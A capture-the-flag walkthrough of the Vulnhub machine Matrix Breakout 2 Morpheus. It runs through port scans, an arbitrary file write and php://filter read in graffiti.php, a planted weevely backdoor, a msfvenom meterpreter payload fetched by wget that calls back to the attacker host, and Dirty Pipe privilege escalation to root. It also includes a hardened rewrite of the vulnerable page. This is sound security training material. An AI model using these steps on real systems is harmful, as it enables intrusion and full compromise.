Vulnhub: Matrix Breakout 2 Morpheus, a detailed walkthrough

Published 2023-04-09 20:55:07, author: Jason_huawen

Matrix Breakout:2 Morpheus

Target information

Name: Matrix-Breakout: 2 Morpheus

URL:

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

Although the author recommends deploying this machine in VirtualBox, in my testing it would not boot there, and it is better imported into VMware.

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.1.1.1        00:50:56:c0:00:01      1      60  VMware, Inc.
 10.1.1.154      00:0c:29:e3:18:3e      1      60  VMware, Inc.
 10.1.1.254      00:50:56:e9:4a:e8      1      60  VMware, Inc.


Using Kali Linux's netdiscover, the target host's IP address is identified as 10.1.1.154 (the MAC address 00:0c:29:e3:18:3e matches the one Nmap reports below).

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.154 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 06:11 EDT
Nmap scan report for bogon (10.1.1.154)
Host is up (0.00088s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|_  256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)
81/tcp open  http    nginx 1.18.0
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Meeting Place
|_http-server-header: nginx/1.18.0
MAC Address: 00:0C:29:E3:18:3E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds

The Nmap results show that the target has three open ports: 22 (ssh), 80 (http) and 81 (http, protected by HTTP Basic authentication).

Getting a shell

First, open port 80 in a browser and download the image it serves to the local machine:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ ls      
nmap_full_scan  trinity.jpeg
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ steghide extract -sf trinity.jpeg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ stegseek trinity.jpeg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.67% (133.0 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ exiftool trinity.jpeg                                                                                                         
ExifTool Version Number         : 12.49
File Name                       : trinity.jpeg
Directory                       : .
File Size                       : 44 kB
File Modification Date/Time     : 2023:04:09 06:14:06-04:00
File Access Date/Time           : 2023:04:09 06:15:07-04:00
File Inode Change Date/Time     : 2023:04:09 06:14:06-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Image Width                     : 709
Image Height                    : 399
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 709x399
Megapixels                      : 0.283
                                                                                                                                                             
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ binwalk -e trinity.jpeg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
382           0x17E           Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"

steghide, stegseek, exiftool and binwalk yield nothing further from the image itself.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ curl http://10.1.1.154/robots.txt                                                     
There's no white rabbit here.  Keep searching!
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ nikto -h http://10.1.1.154       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.154
+ Target Hostname:    10.1.1.154
+ Target Port:        80
+ Start Time:         2023-04-09 06:14:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.51 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 15c, size: 5cf63c252ab85, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ 7889 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-04-09 06:15:41 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.51) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ gobuster dir -u http://10.1.1.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.154
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,js,sh,txt
[+] Timeout:                 10s
===============================================================
2023/04/09 06:17:21 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 348]
/javascript           (Status: 301) [Size: 313] [--> http://10.1.1.154/javascript/]
/robots.txt           (Status: 200) [Size: 47]
/graffiti.txt         (Status: 200) [Size: 139]
/graffiti.php         (Status: 200) [Size: 451]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1318968 / 1323366 (99.67%)
===============================================================
2023/04/09 06:19:32 Finished
===============================================================

Gobuster identifies two files, graffiti.txt and graffiti.php. Accessing them:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ curl http://10.1.1.154/graffiti.txt                                              
Mouse here - welcome to the Nebby!

Make sure not to tell Morpheus about this graffiti wall.
It's just here to let us blow off some steam.
                                               
http://10.1.1.154/graffiti.php

This URL presents a form for posting a message. A quick test shows the Message field is vulnerable to cross-site scripting (XSS), but that is not useful for gaining access here, so the analysis continues.

Intercepting the request with Burp Suite shows that the POST which submits the message also carries a file parameter,

so a local file inclusion vulnerability is possible.

Modify the body to:

message=bob&file=../../../../../etc/passwd

The response is "Cannot open file: ../../../../../etc/passwd". A php://filter wrapper can be used to get around this:

message=bob&file=php://filter/convert.base64-encode/resource=graffiti.php

The response contains the base64-encoded source of graffiti.php. Decoding it on Kali:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ echo '<base64 string from the response, omitted>' | base64 -d
<h1>
<center>
Nebuchadnezzar Graffiti Wall

</center>
</h1>
<p>
<?php

$file="graffiti.txt";
if($_SERVER['REQUEST_METHOD'] == 'POST') {
    if (isset($_POST['file'])) {
       $file=$_POST['file'];
    }
    if (isset($_POST['message'])) {
        $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
        fwrite($handle, $_POST['message']);
        fwrite($handle, "\n");
        fclose($file); 
    }
}

// Display file
$handle = fopen($file,"r");
while (!feof($handle)) {
  echo fgets($handle);
  echo "<br>\n";
}
fclose($handle);
?>
<p>
Enter message: 
<p>
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<input type="hidden" name="file" value="graffiti.txt">
<div><button type="submit">Post</button></div>
</form>
Ym9iCg==             

The key line in the code is:

$handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);

The file parameter is taken straight from the POST body and opened in append mode, so if the Message field holds PHP reverse shell code and the file field is set to, say, jason_shell.php,

the message contents are written to jason_shell.php in the web root.
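For comparison, here is a hardened version of the same graffiti wall. This is an added example, not the target's graffiti.php; the storage directory, the message length limit and the helper names are my assumptions, and the fopen/fwrite append pattern is kept from the page's code (the original also calls fclose($file) on the file name instead of the handle).

```php
<?php
// Added example (not the original graffiti.php): same feature, but the file
// path is fixed in code and never taken from the request.
declare(strict_types=1);

const GRAFFITI_DIR  = __DIR__ . '/data';   // assumed storage directory
const GRAFFITI_FILE = 'graffiti.txt';      // the only file this page may touch
const MAX_MESSAGE   = 512;                 // assumed length limit

// Resolve the target path from constants, never from $_POST['file'].
// This removes both the arbitrary write and the php://filter read primitive.
function graffiti_path(): string
{
    return GRAFFITI_DIR . '/' . GRAFFITI_FILE;
}

// Append one message; returns false on validation or I/O failure instead of
// die()ing with a caller-supplied path echoed back into the page.
function append_message(string $message): bool
{
    $message = trim($message);
    if ($message === '' || strlen($message) > MAX_MESSAGE) {
        return false;
    }
    // Drop control characters so one message cannot smuggle extra lines.
    $message = preg_replace('/[\x00-\x1F\x7F]/', '', $message);

    $handle = fopen(graffiti_path(), 'a');
    if ($handle === false) {
        return false;
    }
    flock($handle, LOCK_EX);
    fwrite($handle, $message . "\n");
    flock($handle, LOCK_UN);
    fclose($handle);   // close the handle, not the file name
    return true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // The hidden <input name="file"> is gone; any 'file' parameter is ignored.
    append_message((string)($_POST['message'] ?? ''));
}

// Display: HTML-encode each stored line, which also closes the XSS noted above.
$lines = @file(graffiti_path(), FILE_IGNORE_NEW_LINES) ?: [];
echo "<h1><center>Nebuchadnezzar Graffiti Wall</center></h1>\n<p>\n";
foreach ($lines as $line) {
    echo htmlspecialchars($line, ENT_QUOTES | ENT_HTML5, 'UTF-8'), "<br>\n";
}
?>
<p>Enter message:
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<div><button type="submit">Post</button></div>
</form>
```

The assumed data directory must be writable by the web server user but sit outside the document root, so nothing appended there is ever served as PHP.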

Uploading the PHP reverse shell code failed; apparently overly long code cannot be uploaded this way, so weevely is used instead to generate backdoor.php:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ weevely generate jason backdoor.php
Generated 'backdoor.php' with password 'jason' of 764 byte size.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ ls -alh 
total 64K
drwxr-xr-x  2 kali kali 4.0K Apr  9 06:46 .
drwxr-xr-x 19 kali kali 4.0K Apr  9 06:08 ..
-rw-r--r--  1 kali kali  764 Apr  9 06:46 backdoor.php
-rwx------  1 kali kali 2.3K Apr  9 06:40 jason_shell.php
-rw-r--r--  1 root root  966 Apr  9 06:11 nmap_full_scan
-rw-r--r--  1 kali kali  44K Apr  9 06:14 trinity.jpeg
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ cat backdoor.php   

Visit http://10.1.1.154/graffiti.php, paste the backdoor.php code into the message box, intercept the request with Burp Suite and change file=graffiti.txt to file=backdoor.php.

The upload succeeds. From Kali Linux, connect to the target with weevely to obtain a shell:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ weevely http://10.1.1.154/backdoor.php jason 

[+] weevely 4.0.1

[+] Target:     10.1.1.154
[+] Session:    /home/kali/.weevely/sessions/10.1.1.154/backdoor_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@morpheus:/var/www/html $ 

Privilege escalation

The next goal is privilege escalation. First, a meterpreter session can be spawned from the existing shell:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp LHOST=10.1.1.143 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: escalate.elf

Upload the generated escalate.elf to the target's /tmp directory and make it executable:

www-data@morpheus:/var/www/html $ cd /tmp
www-data@morpheus:/tmp $ which wget
/usr/bin/wget
www-data@morpheus:/tmp $ wget http://10.1.1.143:8000/escalate.elf
--2023-04-09 18:55:17--  http://10.1.1.143:8000/escalate.elf
Connecting to 10.1.1.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: 'escalate.elf'

     0K                                                       100% 58.5M=0s

2023-04-09 18:55:17 (58.5 MB/s) - 'escalate.elf' saved [207/207]

www-data@morpheus:/tmp $ chmod +x escalate.elf

On the Kali Linux side, start msfconsole and use exploit/multi/handler to start a listener:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 10.1.1.143
LHOST => 10.1.1.143
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.1.1.143:6666 
[*] Sending stage (1017704 bytes) to 10.1.1.154
[*] Meterpreter session 1 opened (10.1.1.143:6666 -> 10.1.1.154:53696) at 2023-04-09 06:57:57 -0400

This establishes a meterpreter session between Kali Linux and the target host.

msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.1.1.154 - Collecting local exploits for x86/linux...
[*] 10.1.1.154 - 174 exploit checks are being tried...
[+] 10.1.1.154 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.10.0
[+] 10.1.1.154 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.1.1.154 - exploit/linux/local/ubuntu_enlightenment_mount_priv_esc: The target appears to be vulnerable.
[*] Running check method for exploit 52 / 52
[*] 10.1.1.154 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2022_0847_dirtypipe                        Yes                      The target appears to be vulnerable. Linux kernel version found: 5.10.0                                                                                                                                                  
 2   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.
 3   exploit/linux/local/ubuntu_enlightenment_mount_priv_esc            Yes                      The target appears to be vulnerable.

Select the first exploit module:

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2022_0847_dirtypipe
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > show options 

Module options (exploit/linux/local/cve_2022_0847_dirtypipe):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   COMPILE           Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                            yes       The session to run this module on
   SUID_BINARY_PATH  /bin/passwd      no        The path to a suid binary
   WRITABLE_DIR      /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set LHOST 10.1.1.143
LHOST => 10.1.1.143
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[*] Started reverse TCP handler on 10.1.1.143:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.10.0
[*] Executing exploit '/tmp/.xbscjxphxw /bin/passwd'
[*] Sending stage (3045348 bytes) to 10.1.1.154
[+] Deleted /tmp/.xbscjxphxw
[*] Meterpreter session 2 opened (10.1.1.143:8888 -> 10.1.1.154:52560) at 2023-04-09 07:50:39 -0400


meterpreter > sessions 2
[*] Session 2 is already interactive.
meterpreter > shell
Process 2466 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 48K
drwx------  4 root root 4.0K Nov 29  2021 .
drwxr-xr-x 19 root root 4.0K Oct 28  2021 ..
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
-rw-------  1 root root   79 Oct 28  2021 .lesshst
drwxr-xr-x  3 root root 4.0K Oct 28  2021 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root   66 Oct 28  2021 .selected_editor
drwxr-xr-x  2 root root 4.0K Oct 28  2021 .vim
-rw-------  1 root root  11K Oct 28  2021 .viminfo
-rw-------  1 root root   54 Oct 28  2021 FLAG.txt
cat FLAG.txt
You've won!

Let's hope Matrix: Resurrections rocks!

This yields a root shell and the root flag.

Lessons learned

  1. For web applications, especially those that handle POST requests, do not cut corners: use Burp Suite to analyze every request.

  2. When using php://filter, first check whether the PHP file itself is returned; sometimes the .php extension must be added and sometimes not. If the file itself comes back, then check whether other files can be read, such as /etc/passwd or /var/log/access.log.